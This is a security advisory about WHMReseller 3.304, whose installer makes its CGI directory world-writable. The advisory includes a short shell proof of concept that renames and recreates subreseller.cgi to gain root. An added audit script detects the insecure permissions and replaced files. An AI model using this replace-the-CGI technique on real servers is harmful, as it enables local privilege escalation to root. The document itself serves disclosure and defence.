WHMReseller 3.304 - any local user could execute commands as root



DESCRIPTION


World-writable permissions on /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller allowed any local user to execute commands as root.



IMPACT


Local users could obtain full root access.


When WHMReseller 3.304 was installed, it changed the permissions of the whmreseller/ directory to 0777:

31802 chmod("./whmreseller", 0777)      = 0


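Renaming and creating directory entries requires write permission on the directory, not on the files in it. As such, you can rename and then recreate any existing file in that directory, regardless of who owns the file.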

[user@host ~]$ cd /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ mv subreseller.cgi subreseller.cgi.old
[user@host /usr/local/cpanel/whostmgr/docroot/cgi/whmreseller]$ cat > subreseller.cgi << EOF
#!/bin/sh
/usr/bin/id > /home/user/id.out
EOF


The next time a reseller accesses WHMReseller, your commands in the subreseller.cgi file you created will be executed as root:

[user@host ~]$ cat id.out
uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sys),4(adm),6(disk),10(wheel)
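
A check for the condition described above, added here as an example and not part of the original advisory or of WHMReseller. It reports world-writable directories and files under a CGI tree, plus files not owned by the expected account, which is what a rename-and-recreate leaves behind. The function name, the output labels and the default expected owner (uid 0) are assumptions.

```shell
#!/bin/sh
# Added example (not from the advisory): report the file-system conditions
# the advisory describes under a CGI tree.
# Assumption: every file in the tree should be owned by uid 0 (root); pass a
# different uid as the second argument if your install differs.

# Usage: audit_cgi_tree DIR [EXPECTED_UID]
# Prints one finding per line and returns 1 if anything was found.
audit_cgi_tree() {
    root=$1
    expected_uid=${2:-0}
    findings=$(
        # Directories with the "other" write bit set (0777 in the advisory):
        # any local user can rename or create entries in them.
        find "$root" -type d -perm -0002 -print | sed 's/^/WRITABLE-DIR /'
        # Files any local user can overwrite in place.
        find "$root" -type f -perm -0002 -print | sed 's/^/WRITABLE-FILE /'
        # Files owned by someone other than the expected account: a file that
        # was renamed away and recreated belongs to whoever recreated it.
        find "$root" -type f ! -user "$expected_uid" -print | sed 's/^/FOREIGN-OWNER /'
    )
    if [ -z "$findings" ]; then
        return 0
    fi
    printf '%s\n' "$findings"
    return 1
}

# Run directly, for example:
#   sh audit.sh /usr/local/cpanel/whostmgr/docroot/cgi
if [ "$#" -gt 0 ]; then
    audit_cgi_tree "$@"
fi
```

A clean ownership listing alone does not prove the files were never replaced; compare the directory's contents against the vendor's distribution after correcting the mode.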